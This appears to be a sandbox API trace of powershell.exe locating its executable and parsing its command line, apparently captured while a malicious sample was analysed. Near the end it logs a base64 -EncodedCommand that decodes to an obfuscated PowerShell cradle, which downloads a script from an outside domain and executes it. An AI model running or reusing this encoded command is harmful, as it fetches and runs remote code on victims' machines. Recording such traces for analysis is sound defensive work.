	[0871.979] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.979] SetErrorMode (uMode=0x1) returned 0x1
	[0871.979] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.979] SetErrorMode (uMode=0x1) returned 0x1
	[0871.980] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.980] SetErrorMode (uMode=0x1) returned 0x1
	[0871.980] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.980] SetErrorMode (uMode=0x1) returned 0x1
	[0871.980] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.980] SetErrorMode (uMode=0x1) returned 0x1
	[0871.981] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.981] SetErrorMode (uMode=0x1) returned 0x1
	[0871.981] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.981] SetErrorMode (uMode=0x1) returned 0x1
	[0871.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.981] SetErrorMode (uMode=0x1) returned 0x1
	[0871.982] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.982] SetErrorMode (uMode=0x1) returned 0x1
	[0871.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.982] SetErrorMode (uMode=0x1) returned 0x1
	[0871.982] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.982] SetErrorMode (uMode=0x1) returned 0x1
	[0871.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.983] SetErrorMode (uMode=0x1) returned 0x1
	[0871.983] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.983] SetErrorMode (uMode=0x1) returned 0x1
	[0871.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.983] SetErrorMode (uMode=0x1) returned 0x1
	[0871.983] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.984] SetErrorMode (uMode=0x1) returned 0x1
	[0871.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.984] SetErrorMode (uMode=0x1) returned 0x1
	[0871.984] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.984] SetErrorMode (uMode=0x1) returned 0x1
	[0871.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.985] SetErrorMode (uMode=0x1) returned 0x1
	[0871.985] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.985] SetErrorMode (uMode=0x1) returned 0x1
	[0871.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.985] SetErrorMode (uMode=0x1) returned 0x1
	[0871.985] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.986] SetErrorMode (uMode=0x1) returned 0x1
	[0871.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.986] SetErrorMode (uMode=0x1) returned 0x1
	[0871.986] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.986] SetErrorMode (uMode=0x1) returned 0x1
	[0871.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.987] SetErrorMode (uMode=0x1) returned 0x1
	[0871.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.987] SetErrorMode (uMode=0x1) returned 0x1
	[0871.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.987] SetErrorMode (uMode=0x1) returned 0x1
	[0871.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.988] SetErrorMode (uMode=0x1) returned 0x1
	[0871.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.988] SetErrorMode (uMode=0x1) returned 0x1
	[0871.988] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.988] SetErrorMode (uMode=0x1) returned 0x1
	[0871.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.989] SetErrorMode (uMode=0x1) returned 0x1
	[0871.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.989] SetErrorMode (uMode=0x1) returned 0x1
	[0871.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.989] SetErrorMode (uMode=0x1) returned 0x1
	[0871.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.990] SetErrorMode (uMode=0x1) returned 0x1
	[0871.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.990] SetErrorMode (uMode=0x1) returned 0x1
	[0871.990] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.990] SetErrorMode (uMode=0x1) returned 0x1
	[0871.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0871.991] SetErrorMode (uMode=0x1) returned 0x1
	[0871.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.991] SetErrorMode (uMode=0x1) returned 0x1
	[0871.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0871.991] SetErrorMode (uMode=0x1) returned 0x1
	[0871.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.992] SetErrorMode (uMode=0x1) returned 0x1
	[0871.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0871.992] SetErrorMode (uMode=0x1) returned 0x1
	[0871.992] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.992] SetErrorMode (uMode=0x1) returned 0x1
	[0871.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0871.993] SetErrorMode (uMode=0x1) returned 0x1
	[0871.993] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.993] SetErrorMode (uMode=0x1) returned 0x1
	[0871.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0871.993] SetErrorMode (uMode=0x1) returned 0x1
	[0871.993] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.994] SetErrorMode (uMode=0x1) returned 0x1
	[0871.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0871.994] SetErrorMode (uMode=0x1) returned 0x1
	[0871.994] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1ba390e0
	[0871.995] FindNextFileW (in: hFindFile=0x1ba390e0, lpFindFileData=0x1c91d9f0 | out: lpFindFileData=0x1c91d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0871.995] FindClose (in: hFindFile=0x1ba390e0 | out: hFindFile=0x1ba390e0) returned 1
	[0871.995] SetErrorMode (uMode=0x1) returned 0x1
	[0871.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c91db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0871.997] SetErrorMode (uMode=0x1) returned 0x1
	[0871.997] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c91dd10 | out: lpFileInformation=0x1c91dd10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0871.997] SetErrorMode (uMode=0x1) returned 0x1
	[0871.998] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0871.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.998] CoTaskMemFree (pv=0x24c520) 
	[0872.000] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.000] CoTaskMemFree (pv=0x24c520) 
	[0872.003] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.003] CoTaskMemFree (pv=0x24c520) 
	[0872.013] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.013] CoTaskMemFree (pv=0x24c520) 
	[0872.029] CoTaskMemAlloc (cb=0x3b) returned 0x1ba484a0
	[0872.029] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c91def8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c91def8) returned 0x4550
	[0872.906] CoTaskMemFree (pv=0x1ba484a0) 
	[0872.913] GetConsoleWindow () returned 0x1075e
	[0872.926] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.926] CoTaskMemFree (pv=0x24c520) 
	[0872.927] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.927] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0872.928] CoTaskMemFree (pv=0x24c520) 
	[0872.934] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0872.934] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0872.934] CoTaskMemFree (pv=0x24c520) 
	[0872.936] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c91df40 | out: pNumArgs=0x1c91df40) returned 0x1ba6d070*=""
	[0872.938] lstrlenW (lpString="-EncodedCommand") returned 15
	[0872.939] CoTaskMemAlloc (cb=0x22) returned 0x1ba78c50
	[0872.939] RtlMoveMemory (in: Destination=0x1ba78c50, Source=0x1ba6d092, Length=0x20 | out: Destination=0x1ba78c50) 
	[0872.939] CoTaskMemFree (pv=0x1ba78c50) 
